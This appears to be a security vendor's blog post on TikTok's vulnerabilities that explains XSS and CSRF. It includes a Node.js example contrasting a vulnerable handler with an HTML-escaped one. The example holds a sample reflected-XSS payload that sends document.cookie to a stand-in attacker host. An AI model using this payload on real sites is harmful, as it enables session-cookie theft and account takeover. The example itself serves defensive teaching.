On Jan. 8, we learned that a series of vulnerabilities in the popular social media app TikTok left the personal information of its users susceptible to exposure, potentially allowing cybercriminals to manipulate content on user accounts. The exposed data included email addresses and birthdates, which can be used in conjunction with other personally identifiable information (PII) for identity theft.
Most troubling is that the app is used mainly by teenagers and children to create short clips: mostly lip-sync videos of 3 to 15 seconds, or short looping videos of 3 to 60 seconds. The app lets users share or save videos of themselves and their loved ones, and these videos sometimes contain very personal or sensitive information that users want to keep private. Now that content is at risk.
TikTok could face even greater scrutiny for this incident because exposing users' personal data in this way is exactly the kind of breach GDPR was written to penalize. The company was already under investigation for GDPR violations over its lack of protection for children, and it had been fined $5.7M in the U.S. for violating the Children’s Online Privacy Protection Act. Beyond the exposure of sensitive user data, failing to secure assets puts a clear financial strain on companies.
Also, the subdomain vulnerability left TikTok open to cross-site scripting attacks. Cross-site scripting (XSS) is a type of injection attack in which malicious script is delivered through an otherwise benign and trusted website: the attacker uses the web application to send malicious code, generally a browser-side script, to a different end user. Because the script arrives from the site's own origin, the browser has no way of knowing that it should not be trusted and executes it with that site's privileges.
Attackers can use cross-site scripting vulnerabilities to bypass access controls such as the same-origin policy. The effect of XSS attacks can range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner. These attacks succeed because the web application places user-supplied input into the output it generates without validating or encoding it.
By contrast, cross-site request forgery (CSRF) exploits the trust that a website has in a user's browser: it tricks an already authenticated browser into sending requests the user never intended, relying on the session cookies the browser attaches automatically.
XSS is one of the most common web vulnerabilities and can lead to phishing attacks, website defacement, session hijacking and installation of malware on a victim’s computer.
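To make the "input reflected into output without encoding" failure concrete, here is an added example, written for this page and not taken from the original post or from any TikTok or WhiteHat code. It shows a reflected XSS in a minimal Node.js request handler next to the hardened version. The route "/search", the query parameter "q" and the host "example.test" are assumptions made for illustration only, and the sample request is constructed, not a real TikTok URL.

```javascript
// Added example, not code from the original post or from TikTok/WhiteHat.
// A reflected XSS in a minimal Node.js handler next to the hardened version.
// The route "/search", the parameter "q" and the host "example.test" are
// assumptions for illustration only.

// Pull the "q" parameter out of a request URL the way a handler would.
// URL is a Node.js global; searchParams.get() percent-decodes the value.
function queryFromUrl(rawUrl) {
  return new URL(rawUrl, "http://example.test").searchParams.get("q") || "";
}

// Vulnerable: the user-controlled value is concatenated straight into the
// HTML body, so a payload such as <script>...</script> comes back as markup
// and the browser runs it with the site's own origin.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// Encode every character that carries meaning in an HTML text node or a
// quoted attribute. This is output encoding for those two contexts only;
// a value placed inside a <script> block or a URL needs a different encoder.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same page, but the input is encoded before interpolation, so the
// browser renders the payload as literal text instead of parsing it as a tag.
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Crude visibility check used only to make the contrast obvious: is there a
// <script ...> tag anywhere in the response? A real test would load the page
// in a browser or run it through a proper HTML parser.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample request (not a real TikTok URL): a classic reflected
// payload that ships document.cookie to an attacker-controlled host.
const SAMPLE_REQUEST =
  "/search?q=<script>location='https://attacker.test/?c='%2Bdocument.cookie</script>";

const demoQuery = queryFromUrl(SAMPLE_REQUEST);
console.log("vulnerable:", renderSearchVulnerable(demoQuery));
console.log("hardened:  ", renderSearchSafe(demoQuery));
console.log(
  "script tag present? vulnerable =", containsScriptTag(renderSearchVulnerable(demoQuery)),
  "hardened =", containsScriptTag(renderSearchSafe(demoQuery))
);
```

Run it with `node` and compare the two lines: the vulnerable handler echoes the `<script>` element verbatim, while the hardened one returns `&lt;script&gt;...` that the browser displays as text. The encoder is context-specific; it is correct for HTML text and quoted attributes, but data that lands inside inline JavaScript, a URL or a CSS value needs the encoder for that context, and a Content Security Policy adds a second layer for the cases output encoding misses.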
This incident emphasizes how critical it is for every company to make security a top priority and to treat the entire IT estate as a vulnerable asset that must be secured. That means protecting APIs, network connections, mobile apps, websites and databases, any of which can become a point of entry for a malicious actor if left unsecured.
WhiteHat Security’s goal is to make the internet safer by securing the applications that are driving today’s business, and while we are always concerned about the various ways that cybercriminals might attack, there’s so much that can be done offensively, and securing applications is a big part of the overall strategy.